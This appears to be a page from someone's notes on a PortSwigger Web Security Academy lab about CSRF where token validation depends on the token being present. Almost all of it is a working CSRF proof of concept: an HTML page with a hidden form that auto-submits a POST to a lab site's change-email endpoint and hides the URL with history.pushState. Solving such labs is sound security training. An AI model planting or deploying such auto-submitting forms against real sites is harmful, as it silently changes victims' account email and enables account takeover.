CSRF where token validation depends on token being present
PreviousCSRF where token validation depends on request methodNextCSRF where token is not tied to user session
Last updated
Last updated
<!DOCTYPE html>
<html lang="en">
<body>
<script>history.pushState('', '', '/')</script>
<h1>Form CSRF PoC</h1>
<form method="POST" action="https://0abc003e030a4bca804d0398001600fc.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="test@test.com">
<input type="submit" value="Submit Request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html> <script>history.pushState('', '', '/')</script>